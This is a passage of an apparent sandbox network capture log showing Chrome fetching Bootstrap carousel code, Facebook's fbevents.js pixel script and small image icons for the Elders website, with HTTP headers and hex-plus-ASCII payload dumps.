                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29 22 2c 77 72 61 70 3a 22 62 6f 6f 6c 65 61 6e 22 2c 74 6f 75 63 68 3a 22 62 6f 6f 6c 65 61 6e 22 7d 2c 7a 3d 22 6e 65 78 74 22 2c 59 3d 22 70 72 65 76 22 2c 71 3d 22 6c 65 66 74 22 2c 51 3d 22 72 69 67 68 74 22 3b 63 6c 61 73 73 20 58 20 65 78 74 65 6e 64 73 20 4d 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 2c 65 29 7b 73 75 70 65 72 28 74 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31
                                                                                                                                                                                                            Data Ascii: rd:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean",touch:"boolean"},z="next",Y="prev",q="left",Q="right";class X extends M{constructor(t,e){super(t),this._items=null,this._interval=null,this._activeElement=null,this._isPaused=!1
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 3b 69 66 28 74 3e 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 7c 7c 74 3c 30 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 29 72 65 74 75 72 6e 20 76 6f 69 64 20 50 2e 6f 6e 65 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 22 73 6c 69 64 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 28 29 3d 3e 74 68 69 73 2e 74 6f 28 74 29 29 3b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 75 73 65 28 29 2c 76 6f 69 64 20 74 68 69 73 2e 63 79 63 6c 65 28 29 3b 63 6f 6e 73 74 20 73 3d 74 3e 65 3f 7a 3a 59 3b 74 68 69 73 2e 5f 73 6c 69 64 65 28 73 2c 74 68 69 73 2e
                                                                                                                                                                                                            Data Ascii: ;const e=this._getItemIndex(this._activeElement);if(t>this._items.length-1||t<0)return;if(this._isSliding)return void P.one(this._element,"slid.bs.carousel",()=>this.to(t));if(e===t)return this.pause(),void this.cycle();const s=t>e?z:Y;this._slide(s,this.
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1378INData Raw: 44 65 6c 74 61 58 3d 74 2e 63 6c 69 65 6e 74 58 2d 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 29 2c 74 68 69 73 2e 5f 68 61 6e 64 6c 65 53 77 69 70 65 28 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 2c 74 68 69 73 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 74 3d 3e 74 68 69 73 2e 63 79 63 6c 65 28 74 29 2c 35 30 30 2b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 3b 55 2e 66 69 6e 64 28 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 20 69 6d 67 22 2c 74 68
                                                                                                                                                                                                            Data Ascii: DeltaX=t.clientX-this.touchStartX),this._handleSwipe(),"hover"===this._config.pause&&(this.pause(),this.touchTimeout&&clearTimeout(this.touchTimeout),this.touchTimeout=setTimeout(t=>this.cycle(t),500+this._config.interval))};U.find(".carousel-item img",th


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            100192.168.2.457772157.240.0.64432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC534OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                                            Host: connect.facebook.net
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                            content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-o26vBPAM' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                            document-policy: force-load-at-top
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1672INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1500INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                            Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC14884INData Raw: 22 29 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 29 3b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3d 21 30 2c 65 3d 21 31 2c 66 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 67 3d 61 5b 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72
                                                                                                                                                                                                            Data Ascii: ");"error"in console&&console.error("Facebook Pixel Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;var g=function(){function a(a,b){var c=[],d=!0,e=!1,f=void 0;try{for(var g=a[typeof Symbol==="function"?Symbol.iter
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1491INData Raw: 29 3b 69 66 28 68 21 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 63 2c 65 76 65 6e 74 5f 74 79 70 65 3a 64 2c 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3a 68 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 22 43 4f 4e 53 54 41 4e 54 5f 56 41 4c 55 45 22 2c 69 64 3a 62 7d 7d 69 66 28 66 3d 3d 3d 22 47 4c 4f 42 41 4c 5f 56 41 52 49 41 42 4c 45 22 29 72 65 74 75 72 6e 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 63 2c 65 76 65 6e 74 5f 74 79 70 65 3a 64 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 22 47 4c 4f 42 41 4c 5f 56 41 52 49 41 42 4c 45 22 2c 69 64 3a 62 7d 3b 69 66 28 66 3d 3d 3d 22 47 54 4d 22 29 72 65 74 75 72 6e 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 63 2c 65 76 65 6e 74 5f 74 79 70 65 3a 64 2c 65 78 74 72 61 63 74 6f 72
                                                                                                                                                                                                            Data Ascii: );if(h!=null)return{domain_uri:c,event_type:d,extractor_config:h,extractor_type:"CONSTANT_VALUE",id:b}}if(f==="GLOBAL_VARIABLE")return{domain_uri:c,event_type:d,extractor_type:"GLOBAL_VARIABLE",id:b};if(f==="GTM")return{domain_uri:c,event_type:d,extractor
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1491INData Raw: 74 22 3b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 31 3b 62 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 63 3d 61 72 67 75 6d 65 6e 74 73 5b 62 5d 3b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 63 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 63 2c 64 29 26 26 28 61 5b 64 5d 3d 63 5b 64 5d 29 7d 72 65 74 75 72 6e 20 61 7d 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 2c 63 3d 62 2e 66 69 6c 74 65 72 2c 64 3d 62 2e 6d 61 70 2c 65 3d 62 2e 72 65 64 75 63 65 3b 66 75 6e 63 74 69 6f
                                                                                                                                                                                                            Data Ascii: t";var a=Object.assign||function(a){for(var b=1;b<arguments.length;b++){var c=arguments[b];for(var d in c)Object.prototype.hasOwnProperty.call(c,d)&&(a[d]=c[d])}return a},b=f.getFbeventsModules("SignalsFBEventsUtils"),c=b.filter,d=b.map,e=b.reduce;functio
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC13402INData Raw: 65 72 63 65 4e 75 6d 62 65 72 3a 6a 2c 63 6f 65 72 63 65 4f 62 6a 65 63 74 3a 6e 2c 63 6f 65 72 63 65 4f 62 6a 65 63 74 57 69 74 68 46 69 65 6c 64 73 3a 75 2c 63 6f 65 72 63 65 53 74 72 69 6e 67 3a 6b 7d 7d 29 28 29 3b 72 65 74 75 72 6e 20 6d 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 43 6f 65 72 63 65 53 74 61 6e 64 61 72 64 50 61 72 61 6d 65 74 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72
                                                                                                                                                                                                            Data Ascii: erceNumber:j,coerceObject:n,coerceObjectWithFields:u,coerceString:k}})();return m.exports}(a,b,c,d)});f.ensureModuleRegistered("signalsFBEventsCoerceStandardParameter",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use str
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1491INData Raw: 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 52 65 73 6f 6c 76 65 4c 69 6e 6b 22 29 3b 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 69 78 65 6c 43 6f 6f 6b 69 65 55 74 69 6c 73 22 29 3b 76 61 72 20 77 3d 73 2e 43 4c 49 43 4b 5f 49 44 5f 50 41 52 41 4d 45 54 45 52 2c 78 3d 73 2e 72 65 61 64 50 61 63 6b 65 64 43 6f 6f 6b 69 65 2c 79 3d 73 2e 43 4c 49 43 4b 54 48 52 4f 55 47 48 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 3b 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 4e 61 6d 65 73 22 29 3b 76 61 72 20 7a 3d 73 2e 55 53 45 5f 46 42 43 5f 41 53 5f 43 41 43 48 45 5f 4b 45 59 5f 45 58 50 45 52 49 4d 45 4e 54
                                                                                                                                                                                                            Data Ascii: s("SignalsFBEventsResolveLink");s=f.getFbeventsModules("SignalsPixelCookieUtils");var w=s.CLICK_ID_PARAMETER,x=s.readPackedCookie,y=s.CLICKTHROUGH_COOKIE_NAME;s=f.getFbeventsModules("SignalsFBEventsExperimentNames");var z=s.USE_FBC_AS_CACHE_KEY_EXPERIMENT
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1491INData Raw: 67 46 6f 72 50 61 72 74 6e 65 72 49 6e 74 65 67 72 61 74 69 6f 6e 73 3a 5b 22 61 75 74 6f 6d 61 74 69 63 6d 61 74 63 68 69 6e 67 66 6f 72 70 61 72 74 6e 65 72 69 6e 74 65 67 72 61 74 69 6f 6e 73 22 5d 2c 43 6f 6d 6d 6f 6e 49 6e 63 6c 75 64 65 73 3a 5b 22 63 6f 6d 6d 6f 6e 69 6e 63 6c 75 64 65 73 22 5d 2c 44 65 66 61 75 6c 74 43 75 73 74 6f 6d 44 61 74 61 3a 5b 22 64 65 66 61 75 6c 74 63 75 73 74 6f 6d 64 61 74 61 22 5d 2c 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 73 3a 5b 22 63 6f 6f 6b 69 65 22 5d 2c 49 57 4c 42 6f 6f 74 73 74 72 61 70 70 65 72 3a 5b 22 69 77 6c 62 6f 6f 74 73 74 72 61 70 70 65 72 22 5d 2c 49 57 4c 50 61 72 61 6d 65 74 65 72 73 3a 5b 22 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 5d 2c 45 53 54 52 75 6c 65 45 6e 67 69 6e 65 3a 5b 22
                                                                                                                                                                                                            Data Ascii: gForPartnerIntegrations:["automaticmatchingforpartnerintegrations"],CommonIncludes:["commonincludes"],DefaultCustomData:["defaultcustomdata"],FirstPartyCookies:["cookie"],IWLBootstrapper:["iwlbootstrapper"],IWLParameters:["iwlparameters"],ESTRuleEngine:["
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC13402INData Raw: 72 28 29 26 26 65 21 3d 22 22 26 26 67 2e 61 70 70 65 6e 64 28 22 66 62 63 22 2c 66 29 3b 42 2e 61 64 64 45 6e 63 6f 64 69 6e 67 73 28 67 29 3b 72 65 74 75 72 6e 20 6f 2e 43 4f 4e 46 49 47 2e 43 44 4e 5f 42 41 53 45 5f 55 52 4c 2b 22 73 69 67 6e 61 6c 73 2f 63 6f 6e 66 69 67 2f 22 2b 61 2b 22 3f 22 2b 67 2e 74 6f 51 75 65 72 79 53 74 72 69 6e 67 28 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 51 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 6f 2e 6c 6f 61 64 4a 53 46 69 6c 65 28 50 28 61 2c 62 2c 63 2c 65 2c 64 2c 66 29 29 7d 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 61 2c 62 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6e 28 74 68 69 73 2c 64 29 3b 74 68 69 73 2e 56 41 4c 49 44 5f 46 45 41 54 55 52 45 53 3d 4b 3b 74 68 69 73 2e 6f 70 74 49 6e
                                                                                                                                                                                                            Data Ascii: r()&&e!=""&&g.append("fbc",f);B.addEncodings(g);return o.CONFIG.CDN_BASE_URL+"signals/config/"+a+"?"+g.toQueryString()};function Q(a,b,c,d,e,f){o.loadJSFile(P(a,b,c,e,d,f))}q=function(){function d(a,b){var e=this;n(this,d);this.VALID_FEATURES=K;this.optIn
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1491INData Raw: 70 65 6f 66 20 67 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 67 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 68 3d 67 2e 75 6e 73 61 66 65 50 69 78 65 6c 2c 6a 3d 67 2e 75 6e 73 61 66 65 54 61 72 67 65 74 2c 6b 3d 65 28 68 2c 63 29 2c 6c 3d 6a 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 3f 62 28 6a 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 6b 21 3d 6e 75 6c 6c 26 26 6c 21 3d 6e 75 6c 6c 3f 5b 7b 70 69 78 65 6c 3a 6b 2c 74 61 72 67 65 74 3a 6c 7d 5d 3a 6e 75 6c 6c 7d 6c 2e 65 78 70 6f 72 74 73 3d 6e 65 77 20 61 28 67 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 6c 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65
                                                                                                                                                                                                            Data Ascii: peof g==="undefined"?"undefined":i(g))!=="object")return null;var h=g.unsafePixel,j=g.unsafeTarget,k=e(h,c),l=j instanceof Node?b(j):null;return k!=null&&l!=null?[{pixel:k,target:l}]:null}l.exports=new a(g)})();return l.exports}(a,b,c,d)});f.ensureModule


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            101192.168.2.457776162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC780OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC583INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"c6-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-bur-kbur8200147-BUR
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1730263299.112974,VS0,VS0,VE2
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 42546
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b02fbc47e73a-DFW
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC204INData Raw: 63 36 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 2e 30 35 38 38 35 20 36 4c 30 20 31 2e 31 30 30 33 35 4c 31 2e 31 33 36 33 34 20 30 4c 37 20 36 4c 31 2e 31 33 36 33 34 20 31 32 4c 30 20 31 30 2e 38 39 39 37 4c 35 2e 30 35 38 38 35 20 36 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: c6<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/></svg>
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            102192.168.2.457775162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC620OUTGET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC559INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 817
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            last-modified: Tue, 22 Nov 2022 06:53:37 GMT
                                                                                                                                                                                                            etag: "331-5ee09a19b9e40"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210121-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730868237.743427,VS0,VS0,VE791
                                                                                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 2754
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b02fee72b78c-DFW
